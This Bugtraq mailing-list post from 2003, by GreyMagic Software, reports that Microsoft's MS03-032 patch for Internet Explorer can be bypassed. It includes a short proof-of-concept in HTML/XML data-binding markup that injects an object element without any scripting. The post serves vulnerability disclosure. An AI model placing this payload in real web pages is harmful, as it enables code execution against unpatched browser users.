Bugtraq mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "GreyMagic Software" <security () greymagic com>
Date: Mon, 8 Sep 2003 16:52:12 +0200
The patch for Drew's object data=funky.hta doesn't work:
This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element.
1. Disable Active Scripting
This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=x.asp></object>
]]>
</exploit>
</security>
</xml>
Ouch.
Current thread:
- BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 GreyMagic Software (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 another temporary solution Igor Franchuk (Sep 10)
- <Possible follow-ups>
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 ADBecker (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nathan Wallwork (Sep 10)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 10)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Crist J. Clark (Sep 12)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- Re: [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick FitzGerald (Sep 09)